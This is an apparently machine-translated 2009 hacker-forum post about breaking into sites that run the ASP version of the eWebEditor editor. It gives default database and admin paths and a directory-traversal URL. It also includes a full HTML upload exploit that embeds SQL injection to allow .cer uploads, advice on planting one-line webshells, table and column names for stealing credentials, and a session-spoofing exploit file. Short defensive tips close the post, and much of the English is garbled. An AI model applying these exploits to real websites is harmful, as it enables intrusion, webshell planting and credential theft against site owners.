Analysis of the asp version of ewebeditor online editor-vulnerability warning-the black bar safety net

ID MYHACK58:62200924165
Type myhack58
Reporter 佚名
Modified 2009-08-05T00:00:00


Ewebeditor editor is currently divided into asp, aspx, php, jsp four types of programs, various types of ewebeditor version many, powerful quite receiving the user favorite, in domestic use is extremely broad. For the current asp version of the ewebeditor editor vulnerability is mainly divided into the following 7 points:

By default, the traversal directory vulnerability, in a word, implantation, configuration, cookie spoofing, social worker(step on the footprints of the invasion, the

NO1. ewebeditor editor is generally the default path for the database is db/ewebeditor. mdb The default background path is admin_login. asp Recommended best detection admin_style. asp whether the file can be accessed directly

NO2. Traversal directory vulnerability, as follows: the Log editor---Upload File manage---select the style directory(just selected a directory) Get: ewebeditor/admin_uploadfile. asp? id=1 4 In id=1 4 behind add&dir=.. Plus &dir=../.. &dir=../../../.. look to the entire website file. This vulnerability to hazards significantly, the absolute horror

NO3. When the database is administrator to modify for asp, asa suffix, can be inserted the word Trojan Client Access to the database, then the word Trojan client connect scored webshell

NO4. Sometimes burst the database can't find the backend address to let people pass up, in fact, you can try to view the style sheet, there is no one else to join the asp, asa suffix to the style sheet, that is, although the stepping on the footprints invasion. There is also the smart administrator that is adding the“#”without the social workers try, I can not less to take advantage of For example:db/#ewebeditor. asa, db/#ewebeditor. asp, db/#ewebeditor. mdb

NO5. Injection 2. 1. 6 of the injection is not to say, the following is saved as an html file to modify the action directly upload cer mA

<H1>ewebeditor asp version 2.1.6 upload exploits procedures----</H1><br><br> <form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye’

union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,

S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_Medi

aSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 0 0><br><br> <input type=submit value=Fuck> </form>

There are times unintentional invasion that I found ewebeditor2. 7. 0 version the presence of injection vulnerabilities A simple use is to http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

The default table name: eWebEditor_System default column name: sys_UserName, the sys_UserPass, and then use nbsi to guess, this will be injected to obtain account password

NO6. Sometimes the administrator does not allow to copy the style, but you see there's a style by someone else before the invasion modify of the presence of asa or the like, can pass the shell, but the upload of the insertion tool is not, and cannot be modified to do that? Maybe a lot of people say it should be machined the tool bar, but I met not so applied So we can use ewebeditor in the upload. asp file for the local configured for upload as follows: (omitted)

NO. 7 There is recent bad customer discovery Use WebEditor session spoofing vulnerability,into the background: Vulnerability file:Admin_Private. asp Vulnerability statement:

<% If Session("eWebEditor_User") = "" Then Response. Redirect "admin_login. asp" Response. End End If

Only the judgment of the session, did not determine the cookies and path verification problem. Exploit: Create a new amxking. asp reads as follows:

<%Session("eWebEditor_User") = "1 1 1 1 1 1 1 1"%>

Access amxking. asp, and then access the backend of any file, for example:Admin_Default. asp

In the face of this threat the site administrator should do the following preventive measures: 1, The use of the eWebEditor editor of the website, should be promptly modify the editor's default database path and extension, recommends that the database Multi-Layers directory, preventing the database is hacking illegal download 2, modify the editor to the backend login path and default login user name and password to prevent hacking into the admin interface 3, The Upload. asp statement to be modified,prevent hackers from using its upload ASP Trojan to get WEB permissions 4, timely on Web Server IIS in the configuration of the application extension mapping to organize, to ensure that other types of files not on the server the website is running on